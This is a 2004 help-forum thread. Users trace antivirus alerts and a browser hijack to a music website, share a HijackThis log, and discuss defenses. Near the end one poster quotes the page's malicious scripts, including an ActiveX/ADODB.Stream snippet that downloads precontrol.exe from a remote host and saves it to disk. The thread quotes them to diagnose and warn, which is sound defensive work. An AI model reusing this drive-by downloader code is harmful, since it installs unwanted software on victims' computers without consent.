Whilst browsing the web I visited www.musicdd.com and the AVG Anti-Virus program installed on my PC reported that it had intercepted a virus and was about to deal with it, which it did.

Was this really a website attempting to infect my PC?

I have just clicked on the above link and again AVG reported the virus "JS/Psyme".
Does such a virus exist?

http://tinyurl.com/2yda2


You may want to take a look at this Usually js is just java script or vbs.
Really shouldn't post the link ???? Dumb asses like me like to click on things :D Hey just by clicking on it won't give you anything looks to me like someone doen't want you to see the site just like a lot of porn places. they put up fakes to scare you..... gotta love fanatic groups....OH that's not politically correct...You gotta love speeeecialllll interest groups.;)

Being a risk taker and a brave soul that I am, I clicked that link and my up to-date AVG Anti-Virus program did not report any viruses.

I did a Google search for "JS/Psyme" virus and it does seem to exist.

It looks like a reputable web site. Unlikely it would be infected.
Of course looks can be deceiving. :) But still unlikely unless their web site was compromised.

Being known as one of the dumb asses that click on links, ;) I gave it a click (on my test comp) which is currently running Norton AV. Norton didn't pick anything up which isn't surprising. Norton doesn't do much with trojans. But Zone Alarm notified me that precontrol.exe was trying to access the internet.

So I looked up precontrol.exe and found THIS (http://www.pestpatrol.com/PestInfo/s/super-spider.asp) . Looks like that site is setting a hijacker on your (and my) computer. How rude.

Sylvander and anyone else who clicked the link should probably follow Pest Patrol's removal instuctions and clean things up.

1. Not everything your AV says is a virus/trojan is that...especially from websites.

It is most likey a hijacker, but since they need call them somethikng...........

2. You can click the little check box, "Automatically parse URLs: " to clear it to preven posting links....

re Steve's link. They advise removing a file called control.exe. Be careful, in Windows this could very well be your control panel in C:\Windows\System32 and C:\Windows\System32\dllcache or in 9x C:\Windows.

Hmm... Either I am lacking in security or something else is wrong.

I didn't think about spyware or such.
I revisited the link and "forced" refreshed it several times and ran both ad-ware and spybot. Both came up clean.

I did a search for *control.exe on my computer and it just showed control.exe which I ran and that just opened my control panel.

I checked the html on that page and the only thing that caught my eye was a reference from fastclick.

Am I missing something or is my security lacking?

Hi John0904, relax, It might also mean you are very well protected.

Just as a check, I ran HJT and cleaned out all the junk. Followed PestPatrols suggestions, rebooted, ran HJT again and it showed a clean log.

I then went back to the site, ZA once again picked up on precontrol.exe trying to access the internet. I declined. I shut down, rebooted and restarted IE. Yes indeed, the browser was hijacked to "searchmyrequest".

I ran HJT again and produced this log...

Logfile of HijackThis v1.97.7
Scan saved at 11:50:11 AM, on 2/26/2004
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\NORTON~1\navapw32.exe
C:\PROGRA~1\ZONELA~1\ZONEAL~1\zlclient.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
A:\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://searchmyrequest.com/sp.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://searchmyrequest.com/hp.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://searchmyrequest.com/sp.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,HomeOldSP = http://searchmyrequest.com/hp.php
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [NAV Agent] C:\PROGRA~1\NORTON~1\navapw32.exe
O4 - HKLM\..\Run: [Zone Labs Client] C:\PROGRA~1\ZONELA~1\ZONEAL~1\zlclient.exe
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll

That site is definately setting a hijacker. Don't you just love it...:rolleyes:

Keep in mind I am running XP and IE without SP1 and my only protection is Norton AV and ZA free.

I scanned my C: drive using the Trend link given by Yoda, and no infected files were found.

I have "C:\Windows\control.exe". but that's just the control panel executable.

It seems AVG did a good job of catching and blocking this.

Keep in mind I am running XP and IE without SP1 and my only protection is Norton AV and ZA free.
Just curious steve, how secure are you otherwise ? I didn't have any problems with visiting that site with multiple browsers, IE and it's clones like avant, crazy,smart explorer etc, opera and ofcourse firefox with xp and IE sp1 patched fully. I am also behind ZA Pro but running avg free.

I did google search on the JS/Psyme name, link mentions ByteVerify also.

What Java are you running, JVM or Sun Java?

Just curious steve, how secure are you otherwise ?

Keep in mind, that was just one of my test computers. I keep the protection marginal in order to play with these types of things. I know, it's kind of weird but I find it interesting.

On my main computer, I run AVG, ZoneAlarm, Spybot, AdAware and SpywareBlaster. I run HJT once a week just to check. I have SP1 and all of the Windows updates. I use Sun Java instead of MS. I use Firefox and Thunderbird instead of IE and OE.

That seems to do the job. :)

Yes, that one is related to the ByteVerify bug....both JVM "infectors".

ByteVerify is commonly used by the CWS family of hijackers.

I am finding the ByteVerify getting caught on my 98SE machine too even though it has Sun Java 1.4.2_03./Firebird 0.7/ZA/router w NAT/NAV2003.
I am not certain it can execute when it downloads however.
HJT is coming out clean after the last quarantine.
CWS is clean too.

The key is whether it can execute.

Sylvander,
I just added Javacool's (free) Spywareblaster to my problem computer, will see if it can help with similar issues that you had.

Yes, with the Sun Java package ByteVerify can still be downloaded but you are correct it will not execute.

About the only thing it can do without the MS JVM is cause your AV to pop up annoying warnings.

How do I find out which I'm running?

Would SISoft Sandra help?

By the way, I have the latest copy [v2.6.1 got 14th Feb] of the installation file for "Spywareblaster", but I'm wary of installing it.
The last [and 1st] time I installed it [v2.5.1 & v2.5.2] I had difficulties and ended up in communication with the author trying to get it right.
In the end I gave up and uninstalled it.
I have "Spywareguard" installed and since I've never really become aware of a need that isn't being fulfilled I'm just chugging along as is.
The problem I had related to versions of DirectX drivers.
I needed an updated "mscomctl.ocx" cabinet file [can't remember the details].

I went back to that web site once more and both ad-ware and spybot came up clean. Also my Hijackthis.log was clean as well.
The only thing I noticed that I missed was that IE blocked 3rd party cookies. Could that be the culprit? I wouldn't think so since cookies are just text based.

In all honesty, I cannot see a web site spreading viruses. Their domain is registered with ARIN or the like. As far as I know, that particular web site has been in operation since 2002.

And this precontrol.exe, isn't a browser suppose to warn you that this file that is about to run on your computer could be a possible virus? I'm sure if you accepted the file, that a anti-virus would catch it thereafter.
Not sure what browsers you all are using but with mine, any file that attempts to download, I get a popup asking if I want to save this file. If I didn't click a download link, red flags popup. I do not have my browser to automatically open files. Duh. :)

So two questions come to mind...
1. Was you system completely clean to start off with? If so...
2. Why this particular web site that triggered alarms?

Sorry if I seem persistent on this but it's like a itch that can't be reached. :D

Originally posted by sylvander,

How do I find out which I'm running?

Would SISoft Sandra help? Don't know about sandra, but this site tells you clearly. http://javatester.org/version.html

<img src=http://img28.photobucket.com/albums/v83/shanmuga/java.jpg>

Sorry if I seem persistent on this but it's like a itch that can't be reached.

Don't be sorry John, I find this kind of thing very interesting too. ;)

I just tried it again. I got the ZA warning that precontrol.exe was trying to access the internet. This time I let it and Norton instantly sent up a virus alert.

Norton AntiVirus has detected a virus on your computer.
Object Name: C:\Documents and Settings\Steve\Local Settin...\justfun[1].exe
Object Name: C:\WINDOWS\leugukpa43.exe
Virus Name: Trojan.StartPage
Action Taken: Unable to repair this file.

So it seems the site drops the precontrol.exe file and then when it makes contact to the 'net it loads the Trojan.StartPage virus.

Here (http://securityresponse.symantec.com/avcenter/venc/data/trojan.startpage.html) is what Norton has to say about it.

Funny. On my main machine I can't even access the musicdd page. :confused:

In all honesty, I cannot see a web site spreading viruses.

Most web sites do not see these things as viral, but as a means of providing advertsing revenue. Most hijackers are exactly that, a means of generating some revenue for the hosting site. Most often the "affilate" programs related to these items aren't all that great, and you need to install hundreds of the farggin things to make any money....

isn't a browser suppose to warn you that this file that is about to run on your computer could be a possible virus?

No, your browser has no idea what is/isn't viral. It can warn about signed/unsigned ActiveX items (if running IE), but even a signed ActiveX doesn't mean "clean"...Gator/Clariaand others are "signed".

This exploit is Java based and the MS JVM has no such warning structure built in....

Not sure what browsers you all are using but with mine, any file that attempts to download, I get a popup asking if I want to save this file.

So, what is this magic browser that will not execute any Java, javacript or any embedded media file without asking first?


So two questions come to mind...
1. Was you system completely clean to start off with? If so...
2. Why this particular web site that triggered alarms?

1. That may need to be answered, but with this particular item, it doesn't really matter. It uses a known exploit, and infects by "drive-by" download, even from "legit" sites.

2. Because that site is actually dropping a file on the machine that is currently classifed as a trojan!

<script LANGUAGE="JScript.Encode" src="ht.tp://therealsearch.com/secure.js">
</SCRIPT>

<script LANGUAGE="JavaScript" src="http://therealsearch.com/affiliates/secure.php?acc=143">
</SCRIPT>

(those two scripts are what does it...the PHP page contains a download link for precontrol.exe....so it is a series of nested scripts that does it)

therealsearch is a known gackware peddler........

Also on that page are fastclick cookies........

ht'+'tp://media.fastclick.net/w

Hitbox cookies....

ht '+' tp://hg1.hitbox.com

For a "legit" site it sure contains a boatload of gackware........

Lesson: not all supposedly "legit" sites are "clean".

Originally posted by mjc
This exploit is Java based and the MS JVM has no such warning structure built in....
I use Sun Java. Could that be why I am not seeing anything?

So, what is this magic browser that will not execute any Java, javacript or any embedded media file without asking first?
IE 6.x Tools > Internet Options > Security > Internet > Custom Level... Have everything Prompted or Disabled. (As deemed fitting.)

Because that site is actually dropping a file on the machine that is currently classifed as a trojan!

<script LANGUAGE="JScript.Encode" src="ht.tp://therealsearch.com/secure.js">
</SCRIPT>

<script LANGUAGE="JavaScript" src="http://therealsearch.com/affiliates/secure.php?acc=143">
</SCRIPT>

(those two scripts are what does it...the PHP page contains a download link for precontrol.exe....so it is a series of nested scripts that does it)
That site is not dropping any "file" on my machine that I can see. As a final test, I put my IE Internet security at the lowest settings. Again, nothing out of the ordinary.
Which tells me that the site (or its advertisers) are just selecting certain computers and or IP addresses.

Also on that page are fastclick cookies........
I knew about that. I have 3rd party cookies blocked by default. :)

What could I do to actually be effected by this web site? Use a different browser? Shut down my firewall, anti-virus program and bypass my router?
Because if this web site is actually passing any virus, I'll contact US-CERT myself and get the ball rolling.

Go for it.........

The second script is the one that actually calls the download.

It is a page hosted on therealsearch server.

if(accountnum == 143 && !getCookie("newwebmaster11")){
document.writeln("<textarea id=\"code\" style=\"display:none;\">");
document.writeln("var x=new ActiveXObject(\"Microsoft.XMLHTTP\");");
document.writeln("var y=new ActiveXObject(\"ADODB.Stream\");");
document.writeln("x.Open(\"GET\",\"ht.tp://searchmyrequest.com/precontrol.exe\",0);");
document.writeln("x.Send();y.Mode=3;y.Type=1;y.Open();");
document.writeln("y.Write(x.responseBody);");
document.writeln("try{y.SaveToFile(\"c:/precontrol.exe\",2);}catch(e){;}");
document.writeln("</textarea>");

So it could be that since you have all third party cookies blocked it is assuming you don't exist or already have had the cookie.

The problem is that most of these things are in a grey area that for the most part CERT ignores......

Not to beat a dead horse, but I decided to install SP1 and all the XP updates and give it another try. Nothing. No ZA warnings. No Norton virus alerts. Whether it is SP1 or the updates I don't know but they did the trick.

Hmmm...M$ is helping to block hijackers. Who would have thought...;)

Thanks Steve. Just the info I needed.
I indeed have SP1 plus all the other updates which is why I wasn't seeing anything.

But could precontrol.exe be considered a virus? Myself, I would think so. It may not pass on person to person, but nevertheless, it can install itself and make unwanted changes to a browser and or system.
What about byteverify/JS/Psyme? If a anti-virus program detects it, must be.

One last question...
Is this web site causing this, its advertisers or both?

I'll start sending out emails about that web site.
I will also submit this thread as collaborating evidence.

Edit:
Even if the web site directly may not be causing this, they should be responsible for their advertisers.

could precontrol.exe be considered a virus?

I don't know. Virus, trojan, hijacker, spyware, adware, gackware, slimeware, who knows. Are there actual definitions for these things? ;)

For virus, trojan and worm definitions look at any of the major AV sites.

Lavasoft and Spybot both have definitions of spyware.

Gackware is my catch-all term for all of the above...slimeware, etc are also catch-all words.

A hijacker is a specific type of gackware that surreptitiously changes home page and search settings to use its creator's web pages.